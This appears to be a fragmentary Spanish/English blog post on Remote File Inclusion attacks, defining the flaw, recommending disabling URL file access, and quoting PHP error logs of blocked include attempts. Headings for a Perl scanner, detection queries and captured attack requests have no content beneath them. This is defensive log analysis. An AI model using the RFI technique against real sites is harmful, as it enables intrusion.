RFI

Remote File Inclusion is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected

Variables que se utilizan en los RFI

Variables que se utilizan en los RFI:

  Consulta para sacar las variables:

 

Scanner RFI en Perl

Scanner detectado en los logs.

 

Configuración recomendada “URL file-access is disabled in the server configuration”

Fallo que da el servidor cuando se intenta acceder a un fichero que está en otro servidor. [Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once() [function.include-once]: URL file-access is disabled in the server configuration in /var/www/htdocs/ot.php on line 3 [Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once(https://localhost/tops.php) [function.include-once]: failed to open stream: no suitable wrapper could be found in /var/www/htdocs/ot.php on line 3 [Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once() [function.include]: Failed opening ‘https://localhost/tops.php’ for inclusion (include_path=’.:/usr/lib/php’) in /var/www/htdocs/ot.php on line 3

Nuevos intentos de ataques RFI

Consulta para detectar los includes en variables:

Include en diferentes variables:

 

Intentos de ataque RFI

Peticiones de includes en el mes de Abril y principios de Mayo:

Intentan añadirse como variables includes en el código.